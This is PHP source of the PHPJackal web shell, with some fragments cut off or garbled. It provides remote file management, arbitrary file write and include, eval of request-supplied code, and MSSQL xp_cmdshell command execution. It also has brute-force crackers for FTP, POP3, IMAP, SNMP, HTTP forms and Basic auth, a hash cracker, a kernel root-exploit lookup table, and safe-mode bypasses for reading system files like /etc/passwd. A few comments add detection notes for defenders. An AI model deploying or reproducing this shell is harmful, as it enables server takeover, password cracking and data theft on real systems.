$td1i="";$td2i="";$tdnr="";$tdw="";if(!empty($_REQUEST['task'])){if(!empty($_REQUEST['search']))$_REQUEST['task']=7;if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
echo '';listdiR($cwd,$_REQUEST['task']);echo '';}else{if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV']) !empty($_REQUEST['rN'])){if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV'])){$title='Destination';$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';}else{$ad=$_REQUEST['rN'];
$title='New name';$dis='Rename';}if(!!empty($_REQUEST['deS'])){echo "$title:$td1n$td2m$hcwd$et";}else{if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);else{copy($ad,$_REQUEST['deS']);
if(!empty($_REQUEST['mV']))unlink($ad);}}}if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}if(!empty($_FILES['uploadfile'])){move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." Filesize: ".$_FILES['uploadfile']['size']. "$et
";}$select="--------
decoration:none' href='#' onClick=\"HS('div');\">- ] Location:$et";$file=$dir=$link=array();if($dirhandle=opendir($cwd)){while($cont=readdir($dirhandle)){if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;else $link[]=$cont;}closedir($dirhandle);sort($file);sort($dir);sort($link);echo "NameOwnerModification timeLast changeInfoSizeActions";$i=0;foreach($dir as $dn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($dn));$mdate=date('Y/m/d H:i:s',filemtime($dn));$adate=date('Y/m/d H:i:s',fileatime($dn));$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>OpenRenameRemove";
if($owner)$own="".$owner['name'].'';if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;echo "";if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W'
;echo '';echo "$cl1------";echo $cl2.$diraction;echo '';}foreach($file as $fn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($fn));$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>OpenEditDownloadHex viewImageInclude
value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>ChecksumCopyMoveRemove";$mdate=date('Y/m/d H:i:s',filemtime($fn));$adate=date('Y/m/d H:i:s',fileatime($fn));if($owner)$own="".$owner['name'].'';$size=showsizE(filesize($fn));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;echo "";if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_ex
ecutable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "";echo "$cl1$size";echo $cl2.$fileaction;echo '';}foreach($link as $ln){$own='Unknow';$i++;$owner=posix_getpwuid(fileowner($ln));$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>OpenEditDownloadHex viewImageIncludeChecksumCopyMoveRenameRemove";$mdate=date('Y/m/d H:i:s',filemtime($ln));$adate=date('Y/m/d H:i:s',fileatime($ln));if($owner)$own="".$owner['name'].'';echo '';
$size=showsizE(filesize($ln));if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;echo "";if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "${cl1}";echo "L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "";echo "$cl1$size";
echo $cl2.$linkaction;echo '';}
}$dc=count($dir)-2;if($dc==-2)$dc=0;$fc=count($file);$lc=count($link);$total=$dc+$fc+$lc;$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size')
,'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';echo "$tableFind:Regular expressions $hcwd$hcwdDisplay files and directories in current folderFind writable files and directories in current folderFindwritable files in current folderFind writable directories in current folderDisplay all files in current folderDisplay all directories in current folder$et
Summery: Total: $total Directories: $dc Files: $fc Links: $lc$et$td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on thisserver is $min$et$et";}}function imapchecK($host,$username,$password,$timeout){$sock=fsockopen($host,143,$n,$s,$timeout);$b=uniqid('NJ');$l=strlen($b);if(!$sock)return -1;fread($sock,1024);fputs($sock,"$b LOGIN $username $password\r\n");$res=fgets($sock,$l+4);fclose($sock);if($res=="$b OK")return 1;else return 0;}function ftpchecK($host,$username,$password,$timeout){$ftp=ftp_connect($host,21,$timeout);if(!$ftp)return -1;$con=ftp_login($ftp,$username,$password);if($con)return 1;else return 0;}function pop3checK($server,$user,$pass,$timeout){$sock=fsockopen($server,110,$en,$es,$timeout);if(!$sock)return -1;fread($sock,1024);
fwrite($sock,"user $user\n");$r=fgets($sock);if($r{0}=='-')return 0;
fwrite($sock,"pass $pass\n");$r=fgets($sock);fclose($sock);if($r{0}=='+')return 1;return 0;}function formcrackeR(){
global $errorbox,$footer,$et,$hcwd;if(!empty($_REQUEST['start'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$url=$_REQUEST['target'];$uf=$_REQUEST['userf'];$pf=$_REQUEST['passf'];$sf=$_REQUEST['submitf'];$sv=$_REQUEST['submitv'];$method=$_REQUEST['method'];$fail=$_REQUEST['fail'];$dic=$_REQUEST['dictionary'];
$type=$_REQUEST['combo'];$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");$dictionary=fopen($dic,'r');echo 'Cracking started...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary)," \n\r");}$url.="?$uf=$user&$pf=$pass&$sf=$sv";$res=check_urL($url,$method,$fail,12);if(!$res){echo "U: $user P: $pass
";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}}fclose($dictionary);echo 'Done!
';}else echo "HTTP Form cracker:Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:$hcwdAction Page:Method:POSTGETUsername field name:Password field name: -
4' bgcolor='#808080'>Submit name:Submit value:Fail string:Log $et";}function hashcrackeR(){global $errorbox,$t,$et,$hcwd;if(!empty($_REQUEST['hash']) && !empty($_REQUEST['dictionary']) && !empty($_REQUEST['type'])){if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');
if($dictionary){$hash=strtoupper($_REQUEST['hash']);echo 'Cracking '.htmlspecialchars($hash).'...
';$type=($_REQUEST['type']=='MD5')?'md5':'sha1';while(!feof($dictionary)){$word=trim(fgets($dictionary)," \n\r");if($hash==strtoupper(($type($word)))){echo "The answer is $word
";if($log)file_add_contentS($file,"$x\r\n");break;}}echo 'Done!';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}}echo "${t}Hash cracker:Dictionary:Hash:Type:MD5SHA1L
og $hcwd $et";}function pr0xy(){global $errorbox,$et,$footer,$hcwd;echo "Navigator: $hcwd$et";if(!empty($_REQUEST['urL'])){
$u=parse_url($_REQUEST['urL']);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$dir=dirname($file);
$con=getiT($_REQUEST['urL']);$s=array("href=mailto"=>"HrEf=mailto","HREF=mailto"=>"HrEf=mailto","href='mailto"=>"HrEf=\"mailto","HREF=\"mailto"=>"HrEf=\"mailto","href=\'mailto"=>"HrEf=\"mailto","HREF=\'mailto"=>"HrEf=\"mailto","href=\"http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"HREF=\'http"=>"HrEf=\"".hlinK("seC=px&urL=http"),"href=http"=>"HrEf=".hlinK("seC=px&urL=http"),"HREF=http"=>"HrEf=".hlinK("seC=px&urL=http"),"href=\""=>"HrEf=\"".hlinK("seC=px&urL=h
ttp://$host/$dir/"),"HREF=\""=>"HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),"href=\""=>"HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),'HREF="'=>'HrEf="'.hlinK("seC=px&urL=http://$host/$dir/"),"href="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),"HREF="=>"HrEf=".hlinK("seC=px&urL=http://$host/$dir/"));$con=replace_stR($s,$con);echo $con;}}function sqlclienT(){global $t,$errorbox,$et,$hcwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];$res=querY($type,$server,$user,$pass,$db,$query);if($res){$res=str_replace('-----','',$res);$res=str_replace('+++++','',$res);$r=explode('[+][+][+]',$res);$r[1]=str_replace('[-][-][-]',"",$r[1]);echo "".$r[1].''.$r[0]."$et
";}else{echo "$errorbox Failed!$et
";}}if(empty($_REQUEST['typE']))$_REQUEST['typE']='';echo "${t}SQL cilent:MySQLMSSQLOraclePostgreSQLServer:Username:Password:Database:Query:";if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES'; echo "$hcwd -
class=buttons type=submit value='Submit Query'>$et";}function querY($type,$host,$user,$pass,$db='',$query){$res='';switch($type){case 'MySQL':if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);if($link){if(!empty($db))mysql_select_db($db,$link);$result=mysql_query($query,$link);while($data=mysql_fetch_row($result))$res.=implode('-----',$data).'+++++';$res.='[+][+][+]';for($i=0;$i
return $res;}break;}return 0;}function phpevaL(){
global $t,$hcwd,$et;echo '';if(!empty($_REQUEST['code'])){$s=array(''=>'');echo "";echo htmlspecialchars(eval(replace_stR($s,$_REQUEST['code'])));echo '
';}echo "${t}Evaler:Codes:";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "$hcwd$et";}function rootxpL(){$v=php_uname();$db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh,raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace,uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx,kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');foreach($db as $k=>$x)if(strstr($v,$k))return $x;return 0;}
/*
 * toolS() -- the "tools" panel; the body continues past the page break that
 * follows these lines. The visible branches, all driven by request
 * parameters, are:
 *
 *  1. 'serveR' + 'domaiN': opens a TCP connection to the supplied server on
 *     port 43 (WHOIS), sends the supplied domain and echoes the reply
 *     without escaping.
 *  2. 'urL': parses the URL, connects to its host and port (default 80),
 *     sends a GET for the path and echoes response lines up to the first
 *     blank line, i.e. the response headers.
 *  3. 'ouT' + 'uN' + 'pW': writes a .htpasswd (user name plus crypt() of the
 *     password) and a .htaccess enabling Basic auth with AuthName "Secure"
 *     into the supplied directory.
 *
 * Defender notes:
 *  - Branches 1 and 2 make the web server open outbound connections to a
 *    host and port chosen by the requester, including internal-only
 *    addresses. Egress filtering and logging of outbound connections from
 *    web workers limit and expose this.
 *  - The fsockopen() result in branch 1 is used without a check, so failed
 *    connections surface as PHP warnings in the error log.
 *  - Unexpected .htaccess/.htpasswd pairs in the web root, especially with
 *    AuthName "Secure", are a file-system indicator worth alerting on.
 */
function toolS(){global $t,$hcwd,$et,$cwd;if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['domaiN'])){$ser=fsockopen($_REQUEST['serveR'],43,$en,$es,5);fputs($ser,$_REQUEST['domaiN']."\r\n");echo '';while(!feof($ser))echo fgets($ser,1024);echo '';fclose($ser);}elseif(!empty($_REQUEST['urL'])){$h='';$u=parse_url($_REQUEST['urL']);
$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$ser=fsockopen($host,$port,$en,$es,5);
if($ser){fputs($ser,"GET $file\r\nHost: $host\r\n\r\n");echo '';while($h!="\r\n"){$h=fgets($ser,1024);echo $h;}echo '';fclose($ser);}
}elseif(!empty($_REQUEST['ouT']) && isset($_REQUEST['pW'])&& !empty($_REQUEST['uN'])){$htpasswd=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htpasswd';$htaccess=$_REQUEST['ouT'].DIRECTORY_SEPARATOR.'.htaccess';file_put_contents($htpasswd,$_REQUEST['uN'].':'.crypt(trim($_REQUEST['pW']),CRYPT_STD_DES));file_put_contents($htaccess,"AuthName \"Secure\"\r\nAuthType Basic\r\nAuthUserFile $htpasswd\r\nRequire valid-user\r\n");echo 'Done';}$s="";echo "${t}WhoIs:${s}Server:domain:$hcwd$et
${t}.ht* generator:${s}Username:Password:Directory:$hcwd$et
${t}Grab header:${s}URL:$hcwd$et
";}function hexvieW(){if(!empty($_REQUEST['filE'])){$f=$_REQUEST['filE'];echo "OffsetHexASCII";$file=fopen($f,'r');$i=-1;while(!feof($file)){$ln='';$i++;echo "";echo str_repeat('0',(8-strlen($i*16))).$i*16;echo '';echo "
echo "'>";for($j=0;$j
echo "$pr$i:(mb_send_mail$po";if(file_exists('/tmp/mb_send_mail'))unlink('/tmp/mb_send_mail');mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');readfile('/tmp/mb_send_mail');$i++;}if(function_exists('curl_init')){
echo "$pr$i:(curl_init [A]$po";$fh=curl_init('file://'.$file.'');$tmp=curl_exec($fh);echo $tmp;$i++;echo "$pr$i:(curl_init [B]$po";$i++;if(strstr($file,DIRECTORY_SEPARATOR))$ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);else $ch=curl_init('file://'.$file."\x00".__FILE__);var_dump(curl_exec($ch));}
if(is_writable('.')){echo "$pr$i:(php.ini$po";file_put_contents('php.ini','safe_mode = Off');readfile($file);unlink('php.ini');$i++;}if(extension_loaded('perl')){echo "$pr$i:(perl$po";echo perlshelL("type \"$file\"");$i++;}if(is_object($ws=new COM('WScript.Shell'))){
echo "$pr$i:(COM$po";echo comshelL("type \"$file\"",$ws);$i++;}if(extension_loaded('ffi') && $windows){echo "$pr$i:(FFI$po";echo ffishelL("type \"$file\"");$i++;}if(checkfunctioN('win_shell_execute')){echo "$pr$i:(win32std$po";echo winshelL("type \"$file\"");
$i++;}if(checkfunctioN('win32_create_service')){echo "$pr$i:(win32service$po";echo srvshelL("type \"$file\"");$i++;}if(function_exists('imap_open')){echo "$pr$i:(imap [A]$po";$str=imap_open('/etc/passwd','','');$list=imap_list($str,$file,'*');for($i=0;$i
$tmp=imap_body($str,1);echo $tmp;imap_close($str);$i++;}if($file=='/etc/passwd'){echo "$pr$i:(posix$po";
for($uid=0;$uid1)$list=imap_list($str,trim($s[0]),trim($s[1]));else $list=imap_list($str,trim($str[0]),'*');for($i=0;$i
echo '';}elseif(!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])){$res='';$tb=uniqid('NJ');$db=mssql_connect($_REQUEST['serveR'],$_REQUEST['useR'],$_REQUEST['pasS']);
mssql_select_db($_REQUEST['dB'],$db);mssql_query("create table $tb ( string VARCHAR (500) NULL)",$db);mssql_query("insert into $tb EXEC master.dbo.xp_cmdshell '".$_REQUEST['coM']."'",$db);$re=mssql_query("select * from $tb",$db);while(($row=mssql_fetch_row($re))){$res.= $row[0]."\r\n";}mssql_query("drop table $tb",$db);mssql_close($db);echo "$res
";}$f=(!empty($_REQUEST['file']))?htmlspecialchars($_REQUEST['file']):'/etc/passwd';$u=(!empty($_REQUEST['user']))?htmlspecialchars($_REQUEST['user']):'root';$p=(!empty($_REQUEST['pass']))?htmlspecialchars($_REQUEST['pass']):'123456';$d=(!empty($_REQUEST['db']))?htmlspecialchars($_REQUEST['db']):'test';echo "${t}Use PHP Bugs:File:$hcwd$et
${t}Use MySQL:File:Username:Password:Database:$hcwd$et
${t}MSSQL Exec:Server:Username:Password:Command:Database:$hcwd$et";}function crackeR(){global $errorbox,$t,$et,$crack,$cwd;$check=(!empty($_REQUEST['dictionary']) && !empty($_REQUEST['target']))?1:0;if(!empty($_REQUEST['cracK']) && !$check){
$c=htmlspecialchars($_REQUEST['cracK']);echo "$t$c cracker:$crack";}elseif(!empty($_REQUEST['cracK']) && $check){$pro=strtolower($_REQUEST['cracK']).'checK';$target=$_REQUEST['target'];$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';$dictionary=fopen($_REQUEST['dictionary'],'r');if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){if($type){$combo=trim(fgets($dictionary)," \n\r");$user=substr($combo,0,strpos($combo,':'));$pass=substr($combo,strpos($combo,':')+1);}else{$pass=trim(fgets($dictionary)," \n\r");}$ret=$pro($target,$user,$pass,5);if($ret==-1){echo "$errorbox Can not connect to server.$et";break;}else{if($ret){$x="U: $user P: $pass";echo "$x
";if($log)file_add_contentS($file,"$x\r\n");if(!$type)break;}}}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}}else{echo "[Hash] - [SMTP] - [POP3] - [IMAP]- [FTP] - [SNMP] - [MySQL] - [MSSQL] - [HTTP Form] - [HTTP Auth(basic)] - [Dictionary maker]$et";}}function snmpcrackeR(){global $t,$et,$errorbox,$hcwd;if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){$target=$_REQUEST['target'];if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;$dictionary=fopen($_REQUEST['dictionary'],'r');if($dictionary){echo 'Cracking '.htmlspecialchars($target).'...
';while(!feof($dictionary)){$com=trim(fgets($dictionary)," \n\r");$res=snmpchecK($target,$com,2);if($res){echo "$com
";if($log)file_add_contentS($file,"$com\r\n");} -
}echo '
Done';fclose($dictionary);}else{echo "$errorbox Can not open dictionary.$et";}}else echo "${t}SNMP cracker:$hcwdDictionary:Server:Log $et";}function dicmakeR(){
global $errorbox,$windows,$footer,$t,$et,$hcwd;$combo=(empty($_REQUEST['combo']))?0:1;if(!empty($_REQUEST['range'])&& !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){$min=$_REQUEST['min'];$max=$_REQUEST['max'];if($max
$user=trim(fgets($in)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}fclose($input);fclose($output);echo 'Done';
}}}else{$output=fopen($_REQUEST['output'],'w');if($output){while(!feof($input)){$user=trim(fgets($input)," \n\r");if(!strstr($user,':'))continue;$user=substr($user,0,(strpos($user,':')));if($combo)fwrite($output,$user.':'.$user."\n");else fwrite($output,$user."\n");}
fclose($input);fclose($output);echo 'Done';}else echo $errorbox.' Unable to write data to '.htmlspecialchars($_REQUEST['input'])."$et
";}}elseif(!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);if($combo && $res){$file=file($_REQUEST['output']);$output=fopen($_REQUEST['output'],'w');foreach($file as $v)fwrite($output,"$v:$v\n");fclose($output);}echo 'Done';}else{$temp=whereistmP().DIRECTORY_SEPARATOR;echo "${t}Wordlist generator:Range:a-zA-Z0-9Min lenght:12345678910Max lenght:23456789101112131415Output:Combo style output$hcwd$et
${t}Grab dictionary:Grab from:Output: -
lue='$temp.dic' name=output size=35>Combo style output$hcwd$et
${t}Download dictionary:URL:Output:Combo style output$hcwd$et";}}function ftpclienT(){global $t,$cwd,$hcwd,$errorbox,$et;$td="";if(!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && function_exists('ftp_connect')){$user=$_REQUEST['useR'];$pass=$_REQUEST['pasS'];$host=$_REQUEST['hosT'];$con=ftp_connect($_REQUEST['hosT'],21,10);if($con){$ftp=ftp_login($con,$user,$pass);if($ftp){if(!empty($_REQUEST['PWD']))ftp_chdir($con,$_REQUEST['PWD']);if(!empty($_REQUEST['filE'])){$file=$_REQUEST['filE'];$mode=(isset($_REQUEST['modE']))?FTP_BINARY:FTP_ASCII;if(isset($_REQUEST['geT']))ftp_get($con,$file,$file,$mode);elseif(isset($_REQUEST['puT']))ftp_put($con,$file,$file,$mode);elseif(isset($_REQUEST['rM'])){
ftp_rmdir($con,$file);ftp_delete($con,$file);}elseif(isset($_REQUEST['mD']))ftp_mkdir($con,$file);}$pwd=ftp_pwd($con);$dir=ftp_nlist($con,'');$d=opendir($cwd);echo "${td}Server:${td}Client:$td$td$td";foreach($dir as $n)echo "$n
";echo "$td";while($cdir=readdir($d))if($cdir!='.' && $cdir!='..')echo "$cdir
"; echo "${td}Name:Binary$td$et";}else echo "$errorbox Wrong username or password$et";}else echo "$errorbox Can not connect to server!$et";}else{echo "${t}FTP cilent:Server:
'#666666'>Username:Password:$hcwd$et";
}}function calC(){global $t,$et,$hcwd;$fu=array('-','md5','sha1','crc32','hex','ip2long','decbin','dechex','hexdec','bindec','long2ip','base64_encode','base64_decode','urldecode','urlencode','des','strrev');if(!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){$to=$_REQUEST['to'];echo "${t}Output:
";if($to=='hex')for($i=0;$i -
$pass=trim(fgets($dictionary)," \n\r");}$so=fsockopen($host,80,$en,$es,5);if(!$so){echo "$errorbox Can not connect to host$et";break;}else{$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$
pass");if($method=='POST')$packet.='Content-Type: application/x-www-form-urlencoded\r\nContent-Length: '.strlen($data);$packet.="\r\n\r\n";$packet.=$data;fputs($so,$packet);$res=substr(fgets($so),9,2);fclose($so);if($res=='20'){echo "U: $user P: $pass";if($log)file_add_contentS($file,"U:$user P: $pass\r\n");}}}
echo 'Done!';}else echo "${t}HTTP Auth cracker:POSTGETDictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";}function openiT($name){$ext=strtolower(substr($name,strrpos($name,'.')+1));$src=array('php','php3','php4','phps','phtml','phtm','inc');if(in_array($ext,$src))highlight_file($name);else echo ''.htmlspecialchars(file_get_contents($name)).'';}function opensesS($name){$sess=file_get_contents($name);$var=explode(';',$sess);echo "Name\tType\tValue\r\n";foreach($var as $v){$t=explode('',$v);$c=explode(':',$t[1]);$y='';if($c[0]=='i')$y='Integer';elseif($c[0]=='s')$y='String';elseif($c[0]=='b')$y='Boolean';elseif($c[0]=='f')$y='Float';elseif($c[0]=='a')$y='Array';elseif($c[0]=='o')$y='Object';elseif($c[0]=='n')$y='Null';
echo $t[0]."\t$y\t".$c[1]."\r\n";}echo '';
}
// logouT(): clears the 'passw' cookie by re-setting it with an empty value
// and an expiry in the past, then redirects to the URL returned by hlinK()
// (defined elsewhere in the file, not visible here).
// Defender note: the cookie name suggests the shell keeps its access
// password client-side in 'passw' -- confirm against the login code. If so,
// web/proxy logs that record cookies will show that name on every
// authenticated request to the shell.
function logouT(){setcookie('passw','',time()-10000);header('Location: '.hlinK());}?>
body{scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table {font-size: 15px;} .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}function HS(box){
if(document.getElementById(box).style.display!="none"){document.getElementById(box).style.display="none";document.getElementById('lk').innerHTML="+";}else{document.getElementById(box).style.display="";document.getElementById('lk').innerHTML="-";}}function chmoD($file){$ch=prompt("Changing file mode["+$file+"]: ex. 777","");if($ch != null)location.href=""+$file+"&modE="+$ch;
}PHPJackal [][Back] -
/*
 * Action dispatcher. Each case label selects one panel handler; the switch
 * header and the variable it tests are not visible on this page (presumably
 * a request parameter -- confirm against an intact sample). Unknown or
 * missing actions fall through to the intro text, and the footer is always
 * printed.
 *
 * Branches that act on request data directly, without a handler:
 *  - 'edit': when 'Save' is set, opens the path in $_REQUEST['file'] for
 *    writing and stores $_REQUEST['edited'] in it (arbitrary file write as
 *    the web-server user); the fopen() result is not checked.
 *  - 'inc':  include()s the path in $_REQUEST['filE'] if it exists, which
 *    executes any PHP that file contains.
 *  - 'eval': hands over to phpevaL(), which evaluates request-supplied code.
 *
 * Defender notes:
 *  - Every capability sits behind one PHP file, so repeated requests to a
 *    single script with parameters in this odd trailing-capital style
 *    (filE, namE) are a usable log signature.
 *  - Denying PHP execution in upload and other writable directories, and
 *    alerting on new or changed .php files in the web root, address the
 *    file-write and include branches at the source.
 */
case 'fm':filemanageR();break;case 'sc':scanneR();break;case 'phpinfo':phpinfo();break;case 'edit':if(!empty($_REQUEST['open']))editoR($_REQUEST['filE']);if(!empty($_REQUEST['Save'])){$filehandle=fopen($_REQUEST['file'],'w');fwrite($filehandle,$_REQUEST['edited']);
fclose($filehandle);}if(!empty($_REQUEST['filE']))editoR($_REQUEST['filE']);else editoR('');break;case 'openit':openiT($_REQUEST['namE']);break;case 'cr':crackeR();break;case 'dic':dicmakeR();break;case 'tools':toolS();break;case 'hex':hexvieW();break;case 'img':showimagE($_REQUEST['filE']);break;case 'inc':if(file_exists($_REQUEST['filE']))include($_REQUEST['filE']);break;case 'hc':hashcrackeR();break;case 'fcr':formcrackeR();break;
case 'auth':authcrackeR();break;case 'ftpc':ftpclienT();break;case 'eval':phpevaL();break;case 'snmp':snmpcrackeR();break;case 'px':pr0xy();break;case 'webshell':webshelL();break;case 'mailer':maileR();break;case 'br':brshelL();break;case 'asm':safemodE();break;case 'sqlcl':sqlclienT();break;case 'calc':calC();break;case 'sysinfo':sysinfO();break;case 'checksum':checksuM($_REQUEST['filE']);break;
case 'logout':logouT();break;default: echo $intro;}}else echo $intro;echo $footer;?>